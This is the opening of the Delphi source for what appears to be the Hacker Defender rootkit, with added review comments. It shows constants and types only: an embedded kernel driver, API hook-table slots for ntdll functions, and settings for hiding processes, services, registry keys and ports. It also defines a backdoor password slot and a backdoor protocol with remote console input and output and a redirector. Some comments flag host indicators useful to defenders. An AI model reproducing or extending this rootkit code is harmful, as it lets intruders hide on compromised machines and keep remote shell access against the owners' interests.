program hxdef100;
// Build-configuration switches. Each one is written as "{ $DEFINE ...}" with a
// space after the opening brace, which makes it a plain comment rather than a
// compiler directive: as the file stands, none of these four symbols is defined.
{ $DEFINE TESTINGTIME}
{ $DEFINE NOSAFEBOOT}
{ $DEFINE NODRIVER}
{ $DEFINE LOGGING}
// The kernel driver is embedded as a resource unless NODRIVER is defined
// (it is not, so driver.res is linked into this executable).
{$IFNDEF NODRIVER}
{$R driver.res}
{$ENDIF}
// UProcAPI is only needed by the TESTINGTIME build; the normal build uses
// the shorter unit list.
{$IFDEF TESTINGTIME}
uses Windows,USysUtils,WinSvc,UJQCompress,UList,UProcAPI;
{$ELSE}
uses Windows,USysUtils,WinSvc,UJQCompress,UList;
{$ENDIF}
const
// Verbosity of the optional debug log. The LOGGING symbol is only commented
// out at the top of this file, so the ELSE branch (0) is what gets compiled.
{$IFDEF LOGGING}
Logging_Level=3;
{$ELSE}
Logging_Level=0;
{$ENDIF}
// Fixed names of the two IPC endpoints and of the driver's device object.
// Because they are hard-coded, these strings are host-level indicators a
// defender can look for in the mailslot and device namespaces.
ServerMailslotNamePart='\\.\mailslot\hxdef-rk100s';
ClientMailslotNamePart='\\.\mailslot\hxdef-rkc';
DriverDeviceName='\\.\HxDefDriver';
SettingsCount=8;
// Number of API hooks in the hook table; earlier values kept as history.
// NOTE(review): the highest HP_* index below is 20, which exceeds HooksCount-1,
// so it is unclear which of the two values bounds the table - confirm.
HooksCount=19;//20;//23;
// Per-module counts of the functions resolved at run time. TotalImport below
// sums the four system DLLs plus ntdll but leaves DLLImport out - confirm
// against the import-resolution code whether that is intended.
DLLImport=5;
Kernel32Import=22;
AdvapiImport=10;
User32Import=1;
WS2_32Import=12;
// One extra ntdll import is resolved when logging is compiled in; the log file
// path (another fixed on-disk indicator) only exists in that build.
{$IFNDEF LOGGING}
NtDLLImport=40;
{$ELSE}
NtDLLImport=41;
HxdefLogFileName='c:\hxdlogex.txt';
{$ENDIF}
TotalImport=Kernel32Import+AdvapiImport+User32Import+WS2_32Import+NtDLLImport;
// NUL-terminated marker string; what it is compared against is not visible here.
HackerIdentificator='kernel32.dll'+#00;
FileMappingNameMaxLen=32;
// Environment variable consulted for the command interpreter path.
ComSpec='COMSPEC';
// HP_* = positions in the hook table. Each value is derived from the previous
// one; the gaps (e.g. +3 after NtQuerySystemInformation) presumably leave room
// for several entries belonging to the same API group - confirm against the
// table definition. The trailing comments give the resolved values.
HP_ReadFile=0; //0
HP_NtQuerySystemInformation=HP_ReadFile+1; //1
HP_NtResumeThread=HP_NtQuerySystemInformation+3; //4
HP_NtReadVirtualMemory=HP_NtResumeThread+3; //7
HP_NtDeviceIoControlFile=HP_NtReadVirtualMemory+2; //9
HP_NtOpenProcess=HP_NtDeviceIoControlFile+8; //17
HP_NtCreateFile=HP_NtOpenProcess+1; //18
HP_NtNotifyChangeDirectoryFile=HP_NtCreateFile+2; //20
// Mailslot read timeout in milliseconds.
MAILSLOT_TIMEOUT=3000;
// Sizes of Win32/native structures, for the cases where the record is not
// declared by the Windows unit. STARTUP_INFO_SIZE=$44 is the 32-bit
// STARTUPINFOA size; ENUM_SERVICE_STATUS_PROCESS adds dwProcessId and
// dwServiceFlags (2*4 bytes) to ENUM_SERVICE_STATUS.
MEMORY_BASIC_INFORMATION_SIZE=SizeOf(TMemoryBasicInformation);
ENUM_SERVICE_STATUS_SIZE=SizeOf(TEnumServiceStatus);
ENUM_SERVICE_STATUS_PROCESS_SIZE=SizeOf(TEnumServiceStatus)+8;
STARTUP_INFO_SIZE=$44;
SYSTEM_HANDLE_INFORMATION_SIZE=$10;
// Native-API information classes: NtQuerySystemInformation (5 = process and
// thread list), NtQueryObject (1 = object name) and
// NtQueryVolumeInformationFile (3 / 7 = volume size information).
SystemProcessesAndThreadsInformation=5;
ObjectNameInformation=1;
FileFsSizeInformation=3;
FileFsFullSizeInformation=7;
// ACL/SID constants for building an access entry for the world SID
// ("Everyone", S-1-1-0: authority 1, RID 0).
// NOTE(review): ACL revision 3 is used here while the SDK's default
// ACL_REVISION is 2 - confirm this is intended.
ACL_REVISION=$0003;
SECURITY_WORLD_SID_AUTHORITY:TSIDIdentifierAuthority=(Value:(0,0,0,0,0,1));
SECURITY_WORLD_RID:Cardinal=$00000000;
SECURITY_ATTRIBUTES_SIZE=SizeOf(TSecurityAttributes);
// C_* flags: judging by the names, the opcode-table bit set of an x86
// instruction-length decoder (operand/immediate size, prefix, ModRM
// classes) - confirm against the routine that consumes them.
C_MEM1 =$0001;
C_MEM2 =$0002;
C_MEM4 =$0004;
C_PREFIX =$0008;
C_67 =$0010;
C_MEM67 =$0020;
C_DATA1 =$0100;
C_DATA2 =$0200;
C_DATA4 =$0400;
C_66 =$1000;
C_DATA66 =$2000;
C_MODRM =$4000;
C_DATAW0 =$8000;
// Winsock 2 constants expected by the ws2_32 functions resolved above
// (FIONBIO/FIONREAD ioctl codes, address family, event masks, WAIT_TIMEOUT).
SOCKET_ERROR=-1;
WSA_FLAG_OVERLAPPED=$01;
FIONBIO=$8004667E;
FIONREAD=$4004667F;
AF_INET=2;
IPPROTO_TCP=6;
SOCK_STREAM=1;
SOCK_ADDR_SIZE=16;
FD_READ=$01;
FD_CLOSE=$20;
FD_ALL_EVENTS=$03FF;
WAITFOREVENTSTIMEOUT=250;
WSA_WAIT_TIMEOUT=$00000102;
// Row sizes of the IP helper MIB_TCPROW (5 DWORDs) and MIB_UDPROW (2 DWORDs)
// tables; the TDI_* values appear to size TDI connection-query buffers -
// confirm where they are used.
MIB_TCPROW_SIZE=$14;
MIB_UDPROW_SIZE=$08;
TDI_CONN_IN_SIZE=$18;
TDI_CONN_OUT_FREE_SIZE=$30;
MASTER_KEY_LEN=32;
// Each hook-table slot is 21 bytes: 16 bytes of padding plus a 5-byte jump.
HOOK_TABLE_ITEM_SIZE=2*8+5; //16 nops and jump
ShortcutCount=5;
// FMP_* (0..7) presumably select one of the SettingsCount=8 shared sections
// that carry the configuration between processes - confirm.
FMP_HIDDEN_TABLE =0;
FMP_ROOT_PROCESSES =1;
FMP_HIDDEN_SERVICES =2;
FMP_HIDDEN_REG_KEYS =3;
FMP_HIDDEN_REG_VALUES =4;
FMP_BACKDOOR_PASSWORD =5;
FMP_FREE_SPACE =6;
FMP_HIDDEN_PORTS =7;
// RK_* control messages; all fit the single Msg byte of TIntercomBuffer.
RK_RUN_BACKDOOR_REQ =$01;
RK_RUN_BACKDOOR_RES =$02;
RK_REFRESH_SETTINGS =$03;
RK_UNINSTALL =$FE;
RK_DIE =$FF;
// BSC_* session messages ($E0..$F0); they fit the ID byte of TBackdoorBuffer.
// Request/response pairs share a prefix (INIT_REQ_n / INIT_RES_n, TEST_REQ/RES).
BSC_INIT_REQ_1 =$E0;
BSC_INIT_RES_1 =$E1;
BSC_INIT_REQ_2 =$E2;
BSC_INIT_RES_2 =$E3;
BSC_INIT_REQ_3 =$E4;
BSC_INIT_RES_3 =$E5;
BSC_INIT_COMPLETE =$E6;
BSC_CONSOLE_INPUT =$E7;
BSC_CONSOLE_OUTPUT =$E8;
BSC_AUTHORIZATION_OK =$E9;
BSC_AUTHORIZATION_FAILED =$EA;
BSC_SERVICE_BACKDOOR =$EB;
BSC_SERVICE_REDIRECTOR =$EC;
BSC_SERVICE_TEST_REQ =$ED;
BSC_SERVICE_TEST_RES =$EE;
BSC_CTRL_EVENT =$EF;
BSC_END_REQ =$F0;
// Two-valued mode selectors (install/remove, hook/unhook) passed to routines
// defined later in the file.
DOCTOR_INFECT =$00000001;
DOCTOR_CURE =$00000002;
DIRECT_HOOK_HOOK =$00000001;
DIRECT_HOOK_UNHOOK =$00000002;
//we need array of notify information indexed by notification handles
//size of information is 9 * 4 = 36 bytes
//maximum number of handles is 65536 / 4 = 16384
//this mean 589 824 bytes for one process
NOTIFY_TABLE_ENTRY_SIZE =9*4;
NOTIFY_TABLE_SIZE =NOTIFY_TABLE_ENTRY_SIZE*16384;
//we have to set a new timeout value for wait* functions
//because of freeing memory in unhooking process
//all target process threads has to leave all hooked api before freeing memory
// (2 500 000 * 100 ns = 250 ms; native timeouts are in 100 ns units.)
NEW_WAIT_TIMEOUT =2500000; //250 ms in 100 nanosec units
type
//THookType=(htNewProcess,htRehook,htExistingProcess);
// How the program was started; which code path each value selects is not
// visible in this part of the file.
TStartupFlags=(sfNormal,sfInstallOnly,sfNoService,sfRefresh,sfBackdoor,sfUninstall);
// Detected Windows version (Win32s through XP).
TWindowsVersion=(wvUnknown,wvWin32s,wvWindowsNT40,wvWindows95,wvWindows95OSR2,wvWindows98,wvWindows98SE,wvWindows2000,wvWindowsMe,wvWindowsXP);
// 13-byte message exchanged over the mailslots: a 4-char ID, one message byte
// (presumably an RK_* value) and two 32-bit arguments.
TIntercomBuffer=packed record
ID:array[0..3] of Char;
Msg:Byte;
Data1,Data2:Cardinal;
end;
// Local mirrors of the Win32 ACE_HEADER / ACCESS_ALLOWED_ACE structures,
// used when building DACLs by hand.
ACE_HEADER=record
AceType:Byte;
AceFlags:Byte;
AceSize:Word;
end;
ACCESS_MASK=DWORD;
ACCESS_ALLOWED_ACE=record
Header:ACE_HEADER;
Mask:ACCESS_MASK;
SidStart:DWORD;
end;
TSocket=Cardinal;
// Mirrors CHAR_INFO: one console cell (character + attributes), 4 bytes.
TCharInfoEx=record
case Byte of
0:(UnicodeChar:WCHAR;
UAttributes:Word);
1:(AsciiChar:CHAR;
AAttributes:Word);
end;
// 25x80 console snapshot. The "small" form stores characters and attributes
// in two separate 2000-byte arrays, keeping only one byte of attributes per
// cell (compare the Word attributes in TCharInfoEx).
TConsoleScreen=array[0..24,0..79] of TCharInfoEx;
TConsoleScreenSmall=record
Chars:array[0..25*80-1] of Char;
Attrs:array[0..25*80-1] of Byte;
end;
// Screen contents plus cursor position: 2*2000 + SizeOf(TCoord) = 4004 bytes.
TOutputBuffer=record
ConsoleBuffer:TConsoleScreenSmall;
CursorPosition:TCoord;
end;
TInputBuffer=array[0..127] of TInputRecord;
// Framed session message: ID (presumably a BSC_* value), Size, then a payload
// whose interpretation depends on ID.
// NOTE(review): the Raw view is 4000 bytes while the OutputBuffer variant is
// 4004 bytes, so code that sizes or copies the payload through Raw does not
// cover the whole OutputBuffer; confirm that Size is validated against the
// variant actually in use before the payload is read.
PBackdoorBuffer=^TBackdoorBuffer;
TBackdoorBuffer=packed record
ID:Byte;
Size:Word;
case Byte of
0:(InputBuffer:TInputBuffer);
1:(OutputBuffer:TOutputBuffer);
2:(CtrlType:Cardinal);
3:(Raw:array[0..4000-1] of Char);
end;
// Fixed 256-char string slots.
PStringListItem=^TStringListItem;
TStringListItem=array[0..255] of Char;
// Native UNICODE_STRING / ANSI_STRING: counted strings, not NUL-terminated;
// Length and MaximumLength are byte counts.
PUnicodeString=^TUnicodeString;
TUnicodeString=packed record
Length,MaximumLength:Word;
Buffer:PWideChar;
end;
PAnsiString=^TAnsiString;
TAnsiString=packed record
Length,MaximumLength:Word;
Buffer:PChar;
end;
// VM_COUNTERS / IO_COUNTERS as returned by SystemProcessesAndThreadsInformation.
// NOTE(review): the size fields are declared as PCardinal (a pointer type)
// although they hold counts; the 32-bit layout is unaffected.
TVmCounters=packed record
PeakVirtualSize,VirtualSize:PCardinal;
PageFaultCount:ULONG;
PeakWorkingSetSize,WorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,
QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage:PCardinal;
end;
TIoCounters=packed record
ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,
WriteTransferCount,OtherTransferCount:Int64;
end;
// CLIENT_ID: process and thread identifiers.
TClientId=packed record
UniqueProcess,UniqueThread:Cardinal;
end;
// Per-thread entry that follows each TSystemProcesses record.
// NOTE(review): ContextSwitchCountState looks like two documented fields
// (ContextSwitches and ThreadState) folded into one, which would make this
// record 4 bytes shorter than SYSTEM_THREAD_INFORMATION - confirm against
// the OS versions targeted before walking the Threads array.
TSystemThreads=packed record
KernelTime,UserTime,CreateTime:Int64;
WaitTime:Cardinal;
StartAddress:Pointer;
ClientId:TClientId;
Priority,BasePriority,ContextSwitchCountState,WaitReason:Cardinal;
end;
// SYSTEM_PROCESS_INFORMATION entry. NextEntryDelta is the byte offset to the
// next entry (0 on the last one); Threads is a zero-length placeholder for the
// ThreadCount entries that follow, so it is indexed past its declared bound.
PSystemProcesses=^TSystemProcesses;
TSystemProcesses=packed record
NextEntryDelta,ThreadCount:Cardinal;
Reserved1:array[0..5]of Cardinal;
CreateTime,UserTime,KernelTime:Int64;
ProcessName:TUnicodeString;
BasePriority,ProcessId,InheritedFromProcessId,HandleCount:Cardinal;
Reserved2:array[0..1] of Cardinal;
VmCounters:TVmCounters;
IoCounters:TIoCounters;
Threads:array [0..0] of TSystemThreads;
end;
// Result buffer for NtQueryObject(ObjectNameInformation).
PObjectNameInformation=^TObjectNameInformation;
TObjectNameInformation=packed record
Name:TUnicodeString;
end;
// IO_STATUS_BLOCK: Status overlays Pointer; Information carries the byte
// count of the completed operation (declared here as a pointer type although
// it is a count).
TIoStatusBlock=packed record
case Integer of
0:(Status:Cardinal);
1:(Pointer:Pointer;
Information:PCardinal);
end;
// FILE_FS_SIZE_INFORMATION for NtQueryVolumeInformationFile(FileFsSizeInformation).
TFileFSSizeInformation=record
TotalAllocationUnits,AvailableAllocationUnits:LARGE_INTEGER;
SectorsPerAllocationUnit,BytesPerSector:Cardinal;
end;
// Prototypes of the ntdll entry points resolved at run time (stdcall; they
// return an NTSTATUS as a Cardinal).
TNtQuerySystemInformation=function(ASystemInformationClass:Cardinal;ASystemInformation:Pointer;
ASystemInformationLength:Cardinal;AReturnLength:PCardinal):Cardinal; stdcall;
TNtLoadDriver=function(ADriverServiceName:PUnicodeString):Cardinal; stdcall;